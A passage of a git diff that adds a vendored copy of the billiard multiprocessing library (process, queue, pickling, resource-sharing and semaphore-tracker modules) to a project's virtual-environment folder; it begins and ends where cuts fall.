_winapi.WAIT_OBJECT_0: + code = GetExitCodeProcess(self._handle) + if code == TERMINATE: + code = -signal.SIGTERM + self.returncode = code + + return self.returncode + + def poll(self): + return self.wait(timeout=0) + + def terminate(self): + if self.returncode is None: + try: + _winapi.TerminateProcess(int(self._handle), TERMINATE) + except OSError: + if self.wait(timeout=1.0) is None: + raise diff --git a/env/Lib/site-packages/billiard/process.py b/env/Lib/site-packages/billiard/process.py new file mode 100644 index 00000000..3f1c87c7 --- /dev/null +++ b/env/Lib/site-packages/billiard/process.py @@ -0,0 +1,400 @@ +# +# Module providing the `Process` class which emulates `threading.Thread` +# +# multiprocessing/process.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# +# +# Imports +# + +import os +import sys +import signal +import itertools +import logging +import threading +from _weakrefset import WeakSet + +from multiprocessing import process as _mproc + +try: + ORIGINAL_DIR = os.path.abspath(os.getcwd()) +except OSError: + ORIGINAL_DIR = None + +__all__ = ['BaseProcess', 'Process', 'current_process', 'active_children'] + +# +# Public functions +# + + +def current_process(): + ''' + Return process object representing the current process + ''' + return _current_process + + +def _set_current_process(process): + global _current_process + _current_process = _mproc._current_process = process + + +def _cleanup(): + # check for processes which have finished + for p in list(_children): + if p._popen.poll() is not None: + _children.discard(p) + + +def _maybe_flush(f): + try: + f.flush() + except (AttributeError, EnvironmentError, NotImplementedError): + pass + + +def active_children(_cleanup=_cleanup): + ''' + Return list of process objects corresponding to live child processes + ''' + try: + _cleanup() + except TypeError: + # called after gc collect so _cleanup does not exist anymore + return [] + return list(_children) + + +class BaseProcess: + ''' + Process objects represent activity that is run in a separate process + + The class is analogous to `threading.Thread` + ''' + + def _Popen(self): + raise NotImplementedError() + + def __init__(self, group=None, target=None, name=None, + args=(), kwargs={}, daemon=None, **_kw): + assert group is None, 'group argument must be None for now' + count = next(_process_counter) + self._identity = _current_process._identity + (count, ) + self._config = _current_process._config.copy() + self._parent_pid = os.getpid() + self._popen = None + self._target = target + self._args = tuple(args) + self._kwargs = dict(kwargs) + self._name = ( + name or type(self).__name__ + '-' + + ':'.join(str(i) for i in self._identity) + ) + if daemon is not None: + self.daemon = daemon + if _dangling is not None: + _dangling.add(self) + + self._controlled_termination = False + + def run(self): + ''' + Method to be run in sub-process; can be overridden in sub-class + ''' + if self._target: + self._target(*self._args, **self._kwargs) + + def start(self): + ''' + Start child process + ''' + assert self._popen is None, 'cannot start a process twice' + assert self._parent_pid == os.getpid(), \ + 'can only start a process object created by current process' + _cleanup() + self._popen = self._Popen(self) + self._sentinel = self._popen.sentinel + _children.add(self) + + def close(self): + if self._popen is not None: + self._popen.close() + + def terminate(self): + ''' + Terminate process; sends SIGTERM signal or uses TerminateProcess() + ''' + self._popen.terminate() + + def terminate_controlled(self): + self._controlled_termination = True + self.terminate() + + def join(self, timeout=None): + ''' + Wait until child process terminates + ''' + assert self._parent_pid == os.getpid(), 'can only join a child process' + assert self._popen is not None, 'can only join a started process' + res = self._popen.wait(timeout) + if res is not None: + _children.discard(self) + self.close() + + def is_alive(self): + ''' + Return whether process is alive + ''' + if self is _current_process: + return True + assert self._parent_pid == os.getpid(), 'can only test a child process' + if self._popen is None: + return False + self._popen.poll() + return self._popen.returncode is None + + def _is_alive(self): + if self._popen is None: + return False + return self._popen.poll() is None + + @property + def name(self): + return self._name + + @name.setter + def name(self, name): # noqa + assert isinstance(name, str), 'name must be a string' + self._name = name + + @property + def daemon(self): + ''' + Return whether process is a daemon + ''' + return self._config.get('daemon', False) + + @daemon.setter # noqa + def daemon(self, daemonic): + ''' + Set whether process is a daemon + ''' + assert self._popen is None, 'process has already started' + self._config['daemon'] = daemonic + + @property + def authkey(self): + return self._config['authkey'] + + @authkey.setter # noqa + def authkey(self, authkey): + ''' + Set authorization key of process + ''' + self._config['authkey'] = AuthenticationString(authkey) + + @property + def exitcode(self): + ''' + Return exit code of process or `None` if it has yet to stop + ''' + if self._popen is None: + return self._popen + return self._popen.poll() + + @property + def ident(self): + ''' + Return identifier (PID) of process or `None` if it has yet to start + ''' + if self is _current_process: + return os.getpid() + else: + return self._popen and self._popen.pid + + pid = ident + + @property + def sentinel(self): + ''' + Return a file descriptor (Unix) or handle (Windows) suitable for + waiting for process termination. + ''' + try: + return self._sentinel + except AttributeError: + raise ValueError("process not started") + + @property + def _counter(self): + # compat for 2.7 + return _process_counter + + @property + def _children(self): + # compat for 2.7 + return _children + + @property + def _authkey(self): + # compat for 2.7 + return self.authkey + + @property + def _daemonic(self): + # compat for 2.7 + return self.daemon + + @property + def _tempdir(self): + # compat for 2.7 + return self._config.get('tempdir') + + def __repr__(self): + if self is _current_process: + status = 'started' + elif self._parent_pid != os.getpid(): + status = 'unknown' + elif self._popen is None: + status = 'initial' + else: + if self._popen.poll() is not None: + status = self.exitcode + else: + status = 'started' + + if type(status) is int: + if status == 0: + status = 'stopped' + else: + status = 'stopped[%s]' % _exitcode_to_name.get(status, status) + + return '<%s(%s, %s%s)>' % (type(self).__name__, self._name, + status, self.daemon and ' daemon' or '') + + ## + + def _bootstrap(self): + from . import util, context + global _current_process, _process_counter, _children + + try: + if self._start_method is not None: + context._force_start_method(self._start_method) + _process_counter = itertools.count(1) + _children = set() + if sys.stdin is not None: + try: + sys.stdin.close() + sys.stdin = open(os.devnull) + except (EnvironmentError, OSError, ValueError): + pass + old_process = _current_process + _set_current_process(self) + + # Re-init logging system. + # Workaround for https://bugs.python.org/issue6721/#msg140215 + # Python logging module uses RLock() objects which are broken + # after fork. This can result in a deadlock (Celery Issue #496). + loggerDict = logging.Logger.manager.loggerDict + logger_names = list(loggerDict.keys()) + logger_names.append(None) # for root logger + for name in logger_names: + if not name or not isinstance(loggerDict[name], + logging.PlaceHolder): + for handler in logging.getLogger(name).handlers: + handler.createLock() + logging._lock = threading.RLock() + + try: + util._finalizer_registry.clear() + util._run_after_forkers() + finally: + # delay finalization of the old process object until after + # _run_after_forkers() is executed + del old_process + util.info('child process %s calling self.run()', self.pid) + try: + self.run() + exitcode = 0 + finally: + util._exit_function() + except SystemExit as exc: + if not exc.args: + exitcode = 1 + elif isinstance(exc.args[0], int): + exitcode = exc.args[0] + else: + sys.stderr.write(str(exc.args[0]) + '\n') + _maybe_flush(sys.stderr) + exitcode = 0 if isinstance(exc.args[0], str) else 1 + except: + exitcode = 1 + if not util.error('Process %s', self.name, exc_info=True): + import traceback + sys.stderr.write('Process %s:\n' % self.name) + traceback.print_exc() + finally: + util.info('process %s exiting with exitcode %d', + self.pid, exitcode) + _maybe_flush(sys.stdout) + _maybe_flush(sys.stderr) + + return exitcode + +# +# We subclass bytes to avoid accidental transmission of auth keys over network +# + + +class AuthenticationString(bytes): + + def __reduce__(self): + from .context import get_spawning_popen + + if get_spawning_popen() is None: + raise TypeError( + 'Pickling an AuthenticationString object is ' + 'disallowed for security reasons') + return AuthenticationString, (bytes(self),) + +# +# Create object representing the main process +# + + +class _MainProcess(BaseProcess): + + def __init__(self): + self._identity = () + self._name = 'MainProcess' + self._parent_pid = None + self._popen = None + self._config = {'authkey': AuthenticationString(os.urandom(32)), + 'semprefix': '/mp'} + +_current_process = _MainProcess() +_process_counter = itertools.count(1) +_children = set() +del _MainProcess + + +Process = BaseProcess + +# +# Give names to some return codes +# + +_exitcode_to_name = {} + +for name, signum in signal.__dict__.items(): + if name[:3] == 'SIG' and '_' not in name: + _exitcode_to_name[-signum] = name + +# For debug and leak testing +_dangling = WeakSet() diff --git a/env/Lib/site-packages/billiard/queues.py b/env/Lib/site-packages/billiard/queues.py new file mode 100644 index 00000000..bd16f8c3 --- /dev/null +++ b/env/Lib/site-packages/billiard/queues.py @@ -0,0 +1,403 @@ +# +# Module implementing queues +# +# multiprocessing/queues.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +import sys +import os +import threading +import collections +import weakref +import errno + +from . import connection +from . import context + +from .compat import get_errno +from time import monotonic +from queue import Empty, Full +from .util import ( + debug, error, info, Finalize, register_after_fork, is_exiting, +) +from .reduction import ForkingPickler + +__all__ = ['Queue', 'SimpleQueue', 'JoinableQueue'] + + +class Queue: + ''' + Queue type using a pipe, buffer and thread + ''' + def __init__(self, maxsize=0, *args, **kwargs): + try: + ctx = kwargs['ctx'] + except KeyError: + raise TypeError('missing 1 required keyword-only argument: ctx') + if maxsize <= 0: + # Can raise ImportError (see issues #3770 and #23400) + from .synchronize import SEM_VALUE_MAX as maxsize # noqa + self._maxsize = maxsize + self._reader, self._writer = connection.Pipe(duplex=False) + self._rlock = ctx.Lock() + self._opid = os.getpid() + if sys.platform == 'win32': + self._wlock = None + else: + self._wlock = ctx.Lock() + self._sem = ctx.BoundedSemaphore(maxsize) + # For use by concurrent.futures + self._ignore_epipe = False + + self._after_fork() + + if sys.platform != 'win32': + register_after_fork(self, Queue._after_fork) + + def __getstate__(self): + context.assert_spawning(self) + return (self._ignore_epipe, self._maxsize, self._reader, self._writer, + self._rlock, self._wlock, self._sem, self._opid) + + def __setstate__(self, state): + (self._ignore_epipe, self._maxsize, self._reader, self._writer, + self._rlock, self._wlock, self._sem, self._opid) = state + self._after_fork() + + def _after_fork(self): + debug('Queue._after_fork()') + self._notempty = threading.Condition(threading.Lock()) + self._buffer = collections.deque() + self._thread = None + self._jointhread = None + self._joincancelled = False + self._closed = False + self._close = None + self._send_bytes = self._writer.send + self._recv = self._reader.recv + self._send_bytes = self._writer.send_bytes + self._recv_bytes = self._reader.recv_bytes + self._poll = self._reader.poll + + def put(self, obj, block=True, timeout=None): + assert not self._closed + if not self._sem.acquire(block, timeout): + raise Full + + with self._notempty: + if self._thread is None: + self._start_thread() + self._buffer.append(obj) + self._notempty.notify() + + def get(self, block=True, timeout=None): + if block and timeout is None: + with self._rlock: + res = self._recv_bytes() + self._sem.release() + + else: + if block: + deadline = monotonic() + timeout + if not self._rlock.acquire(block, timeout): + raise Empty + try: + if block: + timeout = deadline - monotonic() + if timeout < 0 or not self._poll(timeout): + raise Empty + elif not self._poll(): + raise Empty + res = self._recv_bytes() + self._sem.release() + finally: + self._rlock.release() + # unserialize the data after having released the lock + return ForkingPickler.loads(res) + + def qsize(self): + # Raises NotImplementedError on macOS because + # of broken sem_getvalue() + return self._maxsize - self._sem._semlock._get_value() + + def empty(self): + return not self._poll() + + def full(self): + return self._sem._semlock._is_zero() + + def get_nowait(self): + return self.get(False) + + def put_nowait(self, obj): + return self.put(obj, False) + + def close(self): + self._closed = True + try: + self._reader.close() + finally: + close = self._close + if close: + self._close = None + close() + + def join_thread(self): + debug('Queue.join_thread()') + assert self._closed + if self._jointhread: + self._jointhread() + + def cancel_join_thread(self): + debug('Queue.cancel_join_thread()') + self._joincancelled = True + try: + self._jointhread.cancel() + except AttributeError: + pass + + def _start_thread(self): + debug('Queue._start_thread()') + + # Start thread which transfers data from buffer to pipe + self._buffer.clear() + self._thread = threading.Thread( + target=Queue._feed, + args=(self._buffer, self._notempty, self._send_bytes, + self._wlock, self._writer.close, self._ignore_epipe), + name='QueueFeederThread' + ) + self._thread.daemon = True + + debug('doing self._thread.start()') + self._thread.start() + debug('... done self._thread.start()') + + # On process exit we will wait for data to be flushed to pipe. + # + # However, if this process created the queue then all + # processes which use the queue will be descendants of this + # process. Therefore waiting for the queue to be flushed + # is pointless once all the child processes have been joined. + created_by_this_process = (self._opid == os.getpid()) + if not self._joincancelled and not created_by_this_process: + self._jointhread = Finalize( + self._thread, Queue._finalize_join, + [weakref.ref(self._thread)], + exitpriority=-5 + ) + + # Send sentinel to the thread queue object when garbage collected + self._close = Finalize( + self, Queue._finalize_close, + [self._buffer, self._notempty], + exitpriority=10 + ) + + @staticmethod + def _finalize_join(twr): + debug('joining queue thread') + thread = twr() + if thread is not None: + thread.join() + debug('... queue thread joined') + else: + debug('... queue thread already dead') + + @staticmethod + def _finalize_close(buffer, notempty): + debug('telling queue thread to quit') + with notempty: + buffer.append(_sentinel) + notempty.notify() + + @staticmethod + def _feed(buffer, notempty, send_bytes, writelock, close, ignore_epipe): + debug('starting thread to feed data to pipe') + + nacquire = notempty.acquire + nrelease = notempty.release + nwait = notempty.wait + bpopleft = buffer.popleft + sentinel = _sentinel + if sys.platform != 'win32': + wacquire = writelock.acquire + wrelease = writelock.release + else: + wacquire = None + + try: + while 1: + nacquire() + try: + if not buffer: + nwait() + finally: + nrelease() + try: + while 1: + obj = bpopleft() + if obj is sentinel: + debug('feeder thread got sentinel -- exiting') + close() + return + + # serialize the data before acquiring the lock + obj = ForkingPickler.dumps(obj) + if wacquire is None: + send_bytes(obj) + else: + wacquire() + try: + send_bytes(obj) + finally: + wrelease() + except IndexError: + pass + except Exception as exc: + if ignore_epipe and get_errno(exc) == errno.EPIPE: + return + # Since this runs in a daemon thread the resources it uses + # may be become unusable while the process is cleaning up. + # We ignore errors which happen after the process has + # started to cleanup. + try: + if is_exiting(): + info('error in queue thread: %r', exc, exc_info=True) + else: + if not error('error in queue thread: %r', exc, + exc_info=True): + import traceback + traceback.print_exc() + except Exception: + pass + +_sentinel = object() + + +class JoinableQueue(Queue): + ''' + A queue type which also supports join() and task_done() methods + + Note that if you do not call task_done() for each finished task then + eventually the counter's semaphore may overflow causing Bad Things + to happen. + ''' + + def __init__(self, maxsize=0, *args, **kwargs): + try: + ctx = kwargs['ctx'] + except KeyError: + raise TypeError('missing 1 required keyword argument: ctx') + Queue.__init__(self, maxsize, ctx=ctx) + self._unfinished_tasks = ctx.Semaphore(0) + self._cond = ctx.Condition() + + def __getstate__(self): + return Queue.__getstate__(self) + (self._cond, self._unfinished_tasks) + + def __setstate__(self, state): + Queue.__setstate__(self, state[:-2]) + self._cond, self._unfinished_tasks = state[-2:] + + def put(self, obj, block=True, timeout=None): + assert not self._closed + if not self._sem.acquire(block, timeout): + raise Full + + with self._notempty: + with self._cond: + if self._thread is None: + self._start_thread() + self._buffer.append(obj) + self._unfinished_tasks.release() + self._notempty.notify() + + def task_done(self): + with self._cond: + if not self._unfinished_tasks.acquire(False): + raise ValueError('task_done() called too many times') + if self._unfinished_tasks._semlock._is_zero(): + self._cond.notify_all() + + def join(self): + with self._cond: + if not self._unfinished_tasks._semlock._is_zero(): + self._cond.wait() + + +class _SimpleQueue: + ''' + Simplified Queue type -- really just a locked pipe + ''' + + def __init__(self, rnonblock=False, wnonblock=False, ctx=None): + self._reader, self._writer = connection.Pipe( + duplex=False, rnonblock=rnonblock, wnonblock=wnonblock, + ) + self._poll = self._reader.poll + self._rlock = self._wlock = None + + def empty(self): + return not self._poll() + + def __getstate__(self): + context.assert_spawning(self) + return (self._reader, self._writer, self._rlock, self._wlock) + + def __setstate__(self, state): + (self._reader, self._writer, self._rlock, self._wlock) = state + + def get_payload(self): + return self._reader.recv_bytes() + + def send_payload(self, value): + self._writer.send_bytes(value) + + def get(self): + # unserialize the data after having released the lock + return ForkingPickler.loads(self.get_payload()) + + def put(self, obj): + # serialize the data before acquiring the lock + self.send_payload(ForkingPickler.dumps(obj)) + + def close(self): + if self._reader is not None: + try: + self._reader.close() + finally: + self._reader = None + + if self._writer is not None: + try: + self._writer.close() + finally: + self._writer = None + + +class SimpleQueue(_SimpleQueue): + + def __init__(self, *args, **kwargs): + try: + ctx = kwargs['ctx'] + except KeyError: + raise TypeError('missing required keyword argument: ctx') + self._reader, self._writer = connection.Pipe(duplex=False) + self._rlock = ctx.Lock() + self._wlock = ctx.Lock() if sys.platform != 'win32' else None + + def get_payload(self): + with self._rlock: + return self._reader.recv_bytes() + + def send_payload(self, value): + if self._wlock is None: + # writes to a message oriented win32 pipe are atomic + self._writer.send_bytes(value) + else: + with self._wlock: + self._writer.send_bytes(value) diff --git a/env/Lib/site-packages/billiard/reduction.py b/env/Lib/site-packages/billiard/reduction.py new file mode 100644 index 00000000..1677ffc9 --- /dev/null +++ b/env/Lib/site-packages/billiard/reduction.py @@ -0,0 +1,293 @@ +# +# Module which deals with pickling of objects. +# +# multiprocessing/reduction.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +import functools +import io +import os +import pickle +import socket +import sys + +from . import context + +__all__ = ['send_handle', 'recv_handle', 'ForkingPickler', 'register', 'dump'] + +PY3 = sys.version_info[0] == 3 + + +HAVE_SEND_HANDLE = (sys.platform == 'win32' or + (hasattr(socket, 'CMSG_LEN') and + hasattr(socket, 'SCM_RIGHTS') and + hasattr(socket.socket, 'sendmsg'))) + +# +# Pickler subclass +# + + +if PY3: + import copyreg + + class ForkingPickler(pickle.Pickler): + '''Pickler subclass used by multiprocessing.''' + _extra_reducers = {} + _copyreg_dispatch_table = copyreg.dispatch_table + + def __init__(self, *args): + super(ForkingPickler, self).__init__(*args) + self.dispatch_table = self._copyreg_dispatch_table.copy() + self.dispatch_table.update(self._extra_reducers) + + @classmethod + def register(cls, type, reduce): + '''Register a reduce function for a type.''' + cls._extra_reducers[type] = reduce + + @classmethod + def dumps(cls, obj, protocol=None): + buf = io.BytesIO() + cls(buf, protocol).dump(obj) + return buf.getbuffer() + + @classmethod + def loadbuf(cls, buf, protocol=None): + return cls.loads(buf.getbuffer()) + + loads = pickle.loads + +else: + + class ForkingPickler(pickle.Pickler): # noqa + '''Pickler subclass used by multiprocessing.''' + dispatch = pickle.Pickler.dispatch.copy() + + @classmethod + def register(cls, type, reduce): + '''Register a reduce function for a type.''' + def dispatcher(self, obj): + rv = reduce(obj) + self.save_reduce(obj=obj, *rv) + cls.dispatch[type] = dispatcher + + @classmethod + def dumps(cls, obj, protocol=None): + buf = io.BytesIO() + cls(buf, protocol).dump(obj) + return buf.getvalue() + + @classmethod + def loadbuf(cls, buf, protocol=None): + return cls.loads(buf.getvalue()) + + @classmethod + def loads(cls, buf, loads=pickle.loads): + if isinstance(buf, io.BytesIO): + buf = buf.getvalue() + return loads(buf) +register = ForkingPickler.register + + +def dump(obj, file, protocol=None): + '''Replacement for pickle.dump() using ForkingPickler.''' + ForkingPickler(file, protocol).dump(obj) + +# +# Platform specific definitions +# + +if sys.platform == 'win32': + # Windows + __all__ += ['DupHandle', 'duplicate', 'steal_handle'] + from .compat import _winapi + + def duplicate(handle, target_process=None, inheritable=False): + '''Duplicate a handle. (target_process is a handle not a pid!)''' + if target_process is None: + target_process = _winapi.GetCurrentProcess() + return _winapi.DuplicateHandle( + _winapi.GetCurrentProcess(), handle, target_process, + 0, inheritable, _winapi.DUPLICATE_SAME_ACCESS) + + def steal_handle(source_pid, handle): + '''Steal a handle from process identified by source_pid.''' + source_process_handle = _winapi.OpenProcess( + _winapi.PROCESS_DUP_HANDLE, False, source_pid) + try: + return _winapi.DuplicateHandle( + source_process_handle, handle, + _winapi.GetCurrentProcess(), 0, False, + _winapi.DUPLICATE_SAME_ACCESS | _winapi.DUPLICATE_CLOSE_SOURCE) + finally: + _winapi.CloseHandle(source_process_handle) + + def send_handle(conn, handle, destination_pid): + '''Send a handle over a local connection.''' + dh = DupHandle(handle, _winapi.DUPLICATE_SAME_ACCESS, destination_pid) + conn.send(dh) + + def recv_handle(conn): + '''Receive a handle over a local connection.''' + return conn.recv().detach() + + class DupHandle: + '''Picklable wrapper for a handle.''' + def __init__(self, handle, access, pid=None): + if pid is None: + # We just duplicate the handle in the current process and + # let the receiving process steal the handle. + pid = os.getpid() + proc = _winapi.OpenProcess(_winapi.PROCESS_DUP_HANDLE, False, pid) + try: + self._handle = _winapi.DuplicateHandle( + _winapi.GetCurrentProcess(), + handle, proc, access, False, 0) + finally: + _winapi.CloseHandle(proc) + self._access = access + self._pid = pid + + def detach(self): + '''Get the handle. This should only be called once.''' + # retrieve handle from process which currently owns it + if self._pid == os.getpid(): + # The handle has already been duplicated for this process. + return self._handle + # We must steal the handle from the process whose pid is self._pid. + proc = _winapi.OpenProcess(_winapi.PROCESS_DUP_HANDLE, False, + self._pid) + try: + return _winapi.DuplicateHandle( + proc, self._handle, _winapi.GetCurrentProcess(), + self._access, False, _winapi.DUPLICATE_CLOSE_SOURCE) + finally: + _winapi.CloseHandle(proc) + +else: + # Unix + __all__ += ['DupFd', 'sendfds', 'recvfds'] + import array + + # On macOS we should acknowledge receipt of fds -- see Issue14669 + ACKNOWLEDGE = sys.platform == 'darwin' + + def sendfds(sock, fds): + '''Send an array of fds over an AF_UNIX socket.''' + fds = array.array('i', fds) + msg = bytes([len(fds) % 256]) + sock.sendmsg([msg], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, fds)]) + if ACKNOWLEDGE and sock.recv(1) != b'A': + raise RuntimeError('did not receive acknowledgement of fd') + + def recvfds(sock, size): + '''Receive an array of fds over an AF_UNIX socket.''' + a = array.array('i') + bytes_size = a.itemsize * size + msg, ancdata, flags, addr = sock.recvmsg( + 1, socket.CMSG_LEN(bytes_size), + ) + if not msg and not ancdata: + raise EOFError + try: + if ACKNOWLEDGE: + sock.send(b'A') + if len(ancdata) != 1: + raise RuntimeError( + 'received %d items of ancdata' % len(ancdata), + ) + cmsg_level, cmsg_type, cmsg_data = ancdata[0] + if (cmsg_level == socket.SOL_SOCKET and + cmsg_type == socket.SCM_RIGHTS): + if len(cmsg_data) % a.itemsize != 0: + raise ValueError + a.frombytes(cmsg_data) + assert len(a) % 256 == msg[0] + return list(a) + except (ValueError, IndexError): + pass + raise RuntimeError('Invalid data received') + + def send_handle(conn, handle, destination_pid): # noqa + '''Send a handle over a local connection.''' + fd = conn.fileno() + with socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM) as s: + sendfds(s, [handle]) + + def recv_handle(conn): # noqa + '''Receive a handle over a local connection.''' + fd = conn.fileno() + with socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM) as s: + return recvfds(s, 1)[0] + + def DupFd(fd): + '''Return a wrapper for an fd.''' + popen_obj = context.get_spawning_popen() + if popen_obj is not None: + return popen_obj.DupFd(popen_obj.duplicate_for_child(fd)) + elif HAVE_SEND_HANDLE: + from . import resource_sharer + return resource_sharer.DupFd(fd) + else: + raise ValueError('SCM_RIGHTS appears not to be available') + +# +# Try making some callable types picklable +# + + +def _reduce_method(m): + if m.__self__ is None: + return getattr, (m.__class__, m.__func__.__name__) + else: + return getattr, (m.__self__, m.__func__.__name__) + + +class _C: + def f(self): + pass +register(type(_C().f), _reduce_method) + + +def _reduce_method_descriptor(m): + return getattr, (m.__objclass__, m.__name__) +register(type(list.append), _reduce_method_descriptor) +register(type(int.__add__), _reduce_method_descriptor) + + +def _reduce_partial(p): + return _rebuild_partial, (p.func, p.args, p.keywords or {}) + + +def _rebuild_partial(func, args, keywords): + return functools.partial(func, *args, **keywords) +register(functools.partial, _reduce_partial) + +# +# Make sockets picklable +# + +if sys.platform == 'win32': + + def _reduce_socket(s): + from .resource_sharer import DupSocket + return _rebuild_socket, (DupSocket(s),) + + def _rebuild_socket(ds): + return ds.detach() + register(socket.socket, _reduce_socket) + +else: + + def _reduce_socket(s): # noqa + df = DupFd(s.fileno()) + return _rebuild_socket, (df, s.family, s.type, s.proto) + + def _rebuild_socket(df, family, type, proto): # noqa + fd = df.detach() + return socket.socket(family, type, proto, fileno=fd) + register(socket.socket, _reduce_socket) diff --git a/env/Lib/site-packages/billiard/resource_sharer.py b/env/Lib/site-packages/billiard/resource_sharer.py new file mode 100644 index 00000000..243f5e39 --- /dev/null +++ b/env/Lib/site-packages/billiard/resource_sharer.py @@ -0,0 +1,162 @@ +# +# We use a background thread for sharing fds on Unix, and for sharing +# sockets on Windows. +# +# A client which wants to pickle a resource registers it with the resource +# sharer and gets an identifier in return. The unpickling process will connect +# to the resource sharer, sends the identifier and its pid, and then receives +# the resource. +# + +import os +import signal +import socket +import sys +import threading + +from . import process +from . import reduction +from . import util + +__all__ = ['stop'] + + +if sys.platform == 'win32': + __all__ += ['DupSocket'] + + class DupSocket: + '''Picklable wrapper for a socket.''' + + def __init__(self, sock): + new_sock = sock.dup() + + def send(conn, pid): + share = new_sock.share(pid) + conn.send_bytes(share) + self._id = _resource_sharer.register(send, new_sock.close) + + def detach(self): + '''Get the socket. This should only be called once.''' + with _resource_sharer.get_connection(self._id) as conn: + share = conn.recv_bytes() + return socket.fromshare(share) + +else: + __all__ += ['DupFd'] + + class DupFd: + '''Wrapper for fd which can be used at any time.''' + def __init__(self, fd): + new_fd = os.dup(fd) + + def send(conn, pid): + reduction.send_handle(conn, new_fd, pid) + + def close(): + os.close(new_fd) + self._id = _resource_sharer.register(send, close) + + def detach(self): + '''Get the fd. This should only be called once.''' + with _resource_sharer.get_connection(self._id) as conn: + return reduction.recv_handle(conn) + + +class _ResourceSharer: + '''Manager for resources using background thread.''' + def __init__(self): + self._key = 0 + self._cache = {} + self._old_locks = [] + self._lock = threading.Lock() + self._listener = None + self._address = None + self._thread = None + util.register_after_fork(self, _ResourceSharer._afterfork) + + def register(self, send, close): + '''Register resource, returning an identifier.''' + with self._lock: + if self._address is None: + self._start() + self._key += 1 + self._cache[self._key] = (send, close) + return (self._address, self._key) + + @staticmethod + def get_connection(ident): + '''Return connection from which to receive identified resource.''' + from .connection import Client + address, key = ident + c = Client(address, authkey=process.current_process().authkey) + c.send((key, os.getpid())) + return c + + def stop(self, timeout=None): + '''Stop the background thread and clear registered resources.''' + from .connection import Client + with self._lock: + if self._address is not None: + c = Client(self._address, + authkey=process.current_process().authkey) + c.send(None) + c.close() + self._thread.join(timeout) + if self._thread.is_alive(): + util.sub_warning('_ResourceSharer thread did ' + 'not stop when asked') + self._listener.close() + self._thread = None + self._address = None + self._listener = None + for key, (send, close) in self._cache.items(): + close() + self._cache.clear() + + def _afterfork(self): + for key, (send, close) in self._cache.items(): + close() + self._cache.clear() + # If self._lock was locked at the time of the fork, it may be broken + # -- see issue 6721. Replace it without letting it be gc'ed. + self._old_locks.append(self._lock) + self._lock = threading.Lock() + if self._listener is not None: + self._listener.close() + self._listener = None + self._address = None + self._thread = None + + def _start(self): + from .connection import Listener + assert self._listener is None + util.debug('starting listener and thread for sending handles') + self._listener = Listener(authkey=process.current_process().authkey) + self._address = self._listener.address + t = threading.Thread(target=self._serve) + t.daemon = True + t.start() + self._thread = t + + def _serve(self): + if hasattr(signal, 'pthread_sigmask'): + signal.pthread_sigmask(signal.SIG_BLOCK, range(1, signal.NSIG)) + while 1: + try: + with self._listener.accept() as conn: + msg = conn.recv() + if msg is None: + break + key, destination_pid = msg + send, close = self._cache.pop(key) + try: + send(conn, destination_pid) + finally: + close() + except: + if not util.is_exiting(): + sys.excepthook(*sys.exc_info()) + + +_resource_sharer = _ResourceSharer() +stop = _resource_sharer.stop diff --git a/env/Lib/site-packages/billiard/semaphore_tracker.py b/env/Lib/site-packages/billiard/semaphore_tracker.py new file mode 100644 index 00000000..8ba0df4a --- /dev/null +++ b/env/Lib/site-packages/billiard/semaphore_tracker.py @@ -0,0 +1,146 @@ +# +# On Unix we run a server process which keeps track of unlinked +# semaphores. The server ignores SIGINT and SIGTERM and reads from a +# pipe. Every other process of the program has a copy of the writable +# end of the pipe, so we get EOF when all other processes have exited. +# Then the server process unlinks any remaining semaphore names. +# +# This is important because the system only supports a limited number +# of named semaphores, and they will not be automatically removed till +# the next reboot. Without this semaphore tracker process, "killall +# python" would probably leave unlinked semaphores. +# + +import io +import os +import signal +import sys +import threading +import warnings +from ._ext import _billiard + +from . import spawn +from . import util + +from .compat import spawnv_passfds + +__all__ = ['ensure_running', 'register', 'unregister'] + + +class SemaphoreTracker: + + def __init__(self): + self._lock = threading.Lock() + self._fd = None + + def getfd(self): + self.ensure_running() + return self._fd + + def ensure_running(self): + '''Make sure that semaphore tracker process is running. + + This can be run from any process. Usually a child process will use + the semaphore created by its parent.''' + with self._lock: + if self._fd is not None: + return + fds_to_pass = [] + try: + fds_to_pass.append(sys.stderr.fileno()) + except Exception: + pass + cmd = 'from billiard.semaphore_tracker import main;main(%d)' + r, w = os.pipe() + try: + fds_to_pass.append(r) + # process will out live us, so no need to wait on pid + exe = spawn.get_executable() + args = [exe] + util._args_from_interpreter_flags() + args += ['-c', cmd % r] + spawnv_passfds(exe, args, fds_to_pass) + except: + os.close(w) + raise + else: + self._fd = w + finally: + os.close(r) + + def register(self, name): + '''Register name of semaphore with semaphore tracker.''' + self._send('REGISTER', name) + + def unregister(self, name): + '''Unregister name of semaphore with semaphore tracker.''' + self._send('UNREGISTER', name) + + def _send(self, cmd, name): + self.ensure_running() + msg = '{0}:{1}\n'.format(cmd, name).encode('ascii') + if len(name) > 512: + # posix guarantees that writes to a pipe of less than PIPE_BUF + # bytes are atomic, and that PIPE_BUF >= 512 + raise ValueError('name too long') + nbytes = os.write(self._fd, msg) + assert nbytes == len(msg) + + +_semaphore_tracker = SemaphoreTracker() +ensure_running = _semaphore_tracker.ensure_running +register = _semaphore_tracker.register +unregister = _semaphore_tracker.unregister +getfd = _semaphore_tracker.getfd + + +def main(fd): + '''Run semaphore tracker.''' + # protect the process from ^C and "killall python" etc + signal.signal(signal.SIGINT, signal.SIG_IGN) + signal.signal(signal.SIGTERM, signal.SIG_IGN) + + for f in (sys.stdin, sys.stdout): + try: + f.close() + except Exception: + pass + + cache = set() + try: + # keep track of registered/unregistered semaphores + with io.open(fd, 'rb') as f: + for line in f: + try: + cmd, name = line.strip().split(b':') + if cmd == b'REGISTER': + cache.add(name) + elif cmd == b'UNREGISTER': + cache.remove(name) + else: + raise RuntimeError('unrecognized command %r' % cmd) + except Exception: + try: + sys.excepthook(*sys.exc_info()) + except: + pass + finally: + # all processes have terminated; cleanup any remaining semaphores + if cache: + try: + warnings.warn('semaphore_tracker: There appear to be %d ' + 'leaked semaphores to clean up at shutdown' % + len(cache)) + except Exception: + pass + for name in cache: + # For some reason the process which created and registered this + # semaphore has failed to unregister it. Presumably it has died. + # We therefore unlink it. + try: + name = name.decode('ascii') + try: + 